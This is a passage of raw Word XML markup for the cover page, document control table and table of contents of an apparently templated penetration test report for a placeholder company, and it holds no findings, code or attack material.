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EA13" w14:textId="77777777" w:rsidR="008809CD" w:rsidRDefault="002745FB" w:rsidP="008809CD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76C1CC83" wp14:editId="426C707E">
            <wp:extent cx="1303200" cy="658800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100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303200" cy="658800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_5plbswqalk81" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="37A89CB1" w14:textId="77777777" w:rsidR="009617C1" w:rsidRDefault="009617C1" w:rsidP="008809CD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8FF835" w14:textId="77777777" w:rsidR="008809CD" w:rsidRDefault="00073514" w:rsidP="008809CD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Feb 12, 2025</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_lrvi6050lpgj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="2" w:name="_nhmennf790mq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6031F526" w14:textId="77777777" w:rsidR="008809CD" w:rsidRDefault="008809CD" w:rsidP="008809CD"/>
    <w:p w14:paraId="7796A238" w14:textId="77777777" w:rsidR="00073514" w:rsidRPr="0009036E" w:rsidRDefault="00073514" w:rsidP="0009036E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009036E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>SampleCompany Ltd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA425D" w14:textId="77777777" w:rsidR="00073514" w:rsidRDefault="00073514" w:rsidP="00073514">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1830EBF0" w14:textId="77777777" w:rsidR="00073514" w:rsidRDefault="00073514" w:rsidP="00073514">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D81D39" w14:textId="77777777" w:rsidR="00542637" w:rsidRDefault="00542637" w:rsidP="00073514">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E5CEAD" w14:textId="77777777" w:rsidR="00073514" w:rsidRPr="0009036E" w:rsidRDefault="00073514" w:rsidP="0009036E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_vv8bgdarop3m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="0009036E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Sample Pentest Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13369AD1" w14:textId="77777777" w:rsidR="00073514" w:rsidRDefault="008809CD" w:rsidP="00073514">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="51919EDC" wp14:editId="5A8842ED">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>579120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>201295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4784400" cy="4248000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="100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784400" cy="4248000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE00D8" w14:textId="77777777" w:rsidR="007C1750" w:rsidRPr="007C1750" w:rsidRDefault="007C1750" w:rsidP="00D57DF8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD32BCB" w14:textId="77777777" w:rsidR="00073514" w:rsidRDefault="00073514" w:rsidP="00D57DF8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7343F5F7" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="00073514" w:rsidP="00073514">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="90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2130"/>
        <w:gridCol w:w="6870"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F5CE7" w14:paraId="0DE09193" w14:textId="77777777" w:rsidTr="00436788">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
            <w:tcMar>
              <w:top w:w="243" w:type="dxa"/>
              <w:left w:w="243" w:type="dxa"/>
              <w:bottom w:w="243" w:type="dxa"/>
              <w:right w:w="243" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1140022A" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007F5CE7" w:rsidP="00436788">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6870" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="243" w:type="dxa"/>
              <w:left w:w="243" w:type="dxa"/>
              <w:bottom w:w="243" w:type="dxa"/>
              <w:right w:w="243" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F9FBB48" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007E69DE" w:rsidP="00436788">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F5CE7" w14:paraId="6BEA5EBA" w14:textId="77777777" w:rsidTr="00436788">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
            <w:tcMar>
              <w:top w:w="243" w:type="dxa"/>
              <w:left w:w="243" w:type="dxa"/>
              <w:bottom w:w="243" w:type="dxa"/>
              <w:right w:w="243" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B3D74C3" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007F5CE7" w:rsidP="00436788">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Issued</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6870" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="243" w:type="dxa"/>
              <w:left w:w="243" w:type="dxa"/>
              <w:bottom w:w="243" w:type="dxa"/>
              <w:right w:w="243" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7FB55E2A" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007F5CE7" w:rsidP="00436788">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>John Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F5CE7" w14:paraId="5C6A99F9" w14:textId="77777777" w:rsidTr="00436788">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
            <w:tcMar>
              <w:top w:w="243" w:type="dxa"/>
              <w:left w:w="243" w:type="dxa"/>
              <w:bottom w:w="243" w:type="dxa"/>
              <w:right w:w="243" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1940EDF3" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007F5CE7" w:rsidP="00436788">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Reviewed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6870" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="243" w:type="dxa"/>
              <w:left w:w="243" w:type="dxa"/>
              <w:bottom w:w="243" w:type="dxa"/>
              <w:right w:w="243" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6AF537CD" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007F5CE7" w:rsidP="007F5CE7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F5CE7" w14:paraId="48F9706E" w14:textId="77777777" w:rsidTr="00436788">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
            <w:tcMar>
              <w:top w:w="243" w:type="dxa"/>
              <w:left w:w="243" w:type="dxa"/>
              <w:bottom w:w="243" w:type="dxa"/>
              <w:right w:w="243" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00A1D1E2" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007F5CE7" w:rsidP="00436788">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6870" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="EFEFEF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="243" w:type="dxa"/>
              <w:left w:w="243" w:type="dxa"/>
              <w:bottom w:w="243" w:type="dxa"/>
              <w:right w:w="243" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5AFD7835" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007F5CE7" w:rsidP="007F5CE7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Feb 12, 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="245B15D6" w14:textId="77777777" w:rsidR="007F5CE7" w:rsidRDefault="007F5CE7" w:rsidP="007F5CE7"/>
    <w:p w14:paraId="55617F78" w14:textId="77777777" w:rsidR="00B84031" w:rsidRDefault="007C1750" w:rsidP="00D57DF8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:id w:val="-723452470"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1863F86F" w14:textId="77777777" w:rsidR="00425689" w:rsidRPr="0009036E" w:rsidRDefault="00425689" w:rsidP="0009036E">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0009036E">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4E3E8BFF" w14:textId="77777777" w:rsidR="00425689" w:rsidRPr="00425689" w:rsidRDefault="00425689" w:rsidP="00425689">
          <w:pPr>
            <w:rPr>
              <w:lang w:eastAsia="ja-JP"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0A941BC2" w14:textId="0A1480BE" w:rsidR="001257CD" w:rsidRDefault="00425689">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-RO" w:eastAsia="en-GB"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc190270966" w:history="1">
            <w:r w:rsidR="001257CD" w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="001257CD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-RO" w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001257CD" w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Document control</w:t>
            </w:r>
            <w:r w:rsidR="001257CD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001257CD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001257CD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc190270966 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001257CD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001257CD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001257CD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="001257CD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EF9A9C8" w14:textId="7B2DB8C1" w:rsidR="001257CD" w:rsidRDefault="001257CD">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>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67" w:history="1">
            <w:r w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-RO" w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc190270967 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AF3425B" w14:textId="2AA7F941" w:rsidR="001257CD" w:rsidRDefault="001257CD">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>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68" w:history="1">
            <w:r w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Executive summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc190270968 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6145A20E" w14:textId="35EC5E71" w:rsidR="001257CD" w:rsidRDefault="001257CD">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>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69" w:history="1">
            <w:r w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Findings (grouped by target)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc190270969 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4766DCCF" w14:textId="6272AD54" w:rsidR="001257CD" w:rsidRDefault="001257CD">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>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70" w:history="1">
            <w:r w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 Target:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc190270970 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5031D65A" w14:textId="3D7E808B" w:rsidR="001257CD" w:rsidRDefault="001257CD">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>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71" w:history="1">
            <w:r w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 Target:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc190270971 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22F91CC7" w14:textId="353C2C70" w:rsidR="001257CD" w:rsidRDefault="001257CD">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>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72" w:history="1">
            <w:r w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Addendum</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
